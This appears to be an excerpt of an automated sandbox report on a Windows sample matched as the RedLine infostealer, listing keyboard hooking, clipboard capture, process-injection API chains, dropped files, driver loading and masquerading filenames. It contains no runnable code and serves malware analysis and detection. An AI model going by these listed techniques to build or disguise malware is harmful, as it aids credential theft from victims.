Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPKWk.cs .Net Code: I3Mi2zn6x
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
.NET source code contains very large strings
Source: Trading_AIBot.exe.11.dr, cfRDgxIJtEfCD.cs Long String: Length: 17605
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File dump: apihost.exe.14.dr 665670656 Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08670 NtUnmapViewOfSection, 0_2_02D08670
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08400 NtReadVirtualMemory, 0_2_02D08400
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2C NtAllocateVirtualMemory, 0_2_02D07A2C
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D0DC8C
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D0DC04
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D08D70
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02D0DD70
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07D78 NtWriteVirtualMemory, 0_2_02D07D78
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D07A2A NtAllocateVirtualMemory, 0_2_02D07A2A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D0DBB0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D08D6E
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF64CA NtQueryInformationToken, 7_2_00EF64CA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 7_2_00F07460
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 7_2_00EF4823
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 7_2_00EF643A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 7_2_00F0C1FA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0A135 NtSetInformationFile, 7_2_00F0A135
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken, 7_2_00EF6500
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 7_2_00EE4E3B
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 7_2_00EF4759
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF64CA NtQueryInformationToken, 15_2_00EF64CA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F07460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 15_2_00F07460
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 15_2_00EF4823
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 15_2_00EF643A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 15_2_00F0C1FA
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0A135 NtSetInformationFile, 15_2_00F0A135
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6500 NtQueryInformationToken,NtQueryInformationToken, 15_2_00EF6500
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 15_2_00EE4E3B
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 15_2_00EF4759
Contains functionality to communicate with device drivers
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 7_2_00EE4C10
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02D0F7C8
Creates files inside the system directory
Source: C:\Users\Public\alpha.pif File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
Deletes files inside the Windows folder
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64
Detected potential crypto function
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF20C4 0_2_02CF20C4
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE74B1 7_2_00EE74B1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4875 7_2_00EF4875
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE540A 7_2_00EE540A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE4C10 7_2_00EE4C10
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F04191 7_2_00F04191
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE9144 7_2_00EE9144
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0695A 7_2_00F0695A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF3EB3 7_2_00EF3EB3
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF5A86 7_2_00EF5A86
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0769E 7_2_00F0769E
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EED660 7_2_00EED660
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6E57 7_2_00EE6E57
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE7A34 7_2_00EE7A34
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EEEE03 7_2_00EEEE03
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0BF0 7_2_00EF0BF0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0740 7_2_00EF0740
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE6B20 7_2_00EE6B20
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004028B0 13_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418244 13_2_00418244
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004193C4 13_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0044E3F6 13_2_0044E3F6
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402B90 13_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004073A0 13_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00408C60 13_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040DC11 13_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00407C3F 13_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418CCC 13_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00406CA0 13_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0041A4BE 13_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00401650 13_2_00401650
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F20 13_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00418788 13_2_00418788
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00402F89 13_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB0960 13_2_05AB0960
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB6840 13_2_05AB6840
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_05AB12DC 13_2_05AB12DC
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007000D9 13_2_007000D9
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C51EE 13_2_006C51EE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_007039A3 13_2_007039A3
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F5980 13_2_006F5980
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C6EAF 13_2_006C6EAF
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7B71 13_2_006C7B71
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FD580 13_2_006FD580
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006FC7F0 13_2_006FC7F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C7F80 13_2_006C7F80
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006F3780 13_2_006F3780
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1020 13_2_02AC1020
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_02AC1030 13_2_02AC1030
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064317F8 13_2_064317F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643A500 13_2_0643A500
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430F28 13_2_06430F28
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06430BE0 13_2_06430BE0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0643D9B0 13_2_0643D9B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337E7 13_2_064337E7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_064337F8 13_2_064337F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_06DC31C3 13_2_06DC31C3
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE74B1 15_2_00EE74B1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4875 15_2_00EF4875
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE540A 15_2_00EE540A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE4C10 15_2_00EE4C10
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F04191 15_2_00F04191
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE9144 15_2_00EE9144
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0695A 15_2_00F0695A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF3EB3 15_2_00EF3EB3
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF5A86 15_2_00EF5A86
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0769E 15_2_00F0769E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EED660 15_2_00EED660
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6E57 15_2_00EE6E57
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE7A34 15_2_00EE7A34
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EEEE03 15_2_00EEEE03
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0BF0 15_2_00EF0BF0
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0740 15_2_00EF0740
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE6B20 15_2_00EE6B20
Enables driver privileges
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Enables security privileges
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: String function: 0040E1D8 appears 42 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF44DC appears 74 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF46D4 appears 244 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D0894C appears 56 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4500 appears 33 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02CF4860 appears 949 times
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: String function: 02D089D0 appears 45 times
PE file contains more sections than normal
Source: elevation_service.exe.13.dr Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.13.dr Static PE information: Number of sections : 12 > 10
Sample file is different than original file name gathered from version info
Source: C6dAUcOA6M.exe Binary or memory string: OriginalFilename vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B32000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.00000000209D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1540095281.0000000021EA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A54000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002B51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020AA2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1439616060.0000000021B3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1576898183.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1453650948.00000000023A5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs C6dAUcOA6M.exe
Source: C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs C6dAUcOA6M.exe
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Uses 32bit PE files
Source: C6dAUcOA6M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 13.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 40.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: armsvc.exe.11.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.11.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.13.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, cPs8D.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 72CF8egH.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, G5CXsdn.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3uPsILA6U.cs Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 6oQOw74dfIt.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, aMIWm.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, 3QjbQ514BDx.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.spre.troj.spyw.evad.winEXE@59/159@135/22
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF7FD4 GetDiskFreeSpaceA, 0_2_02CF7FD4
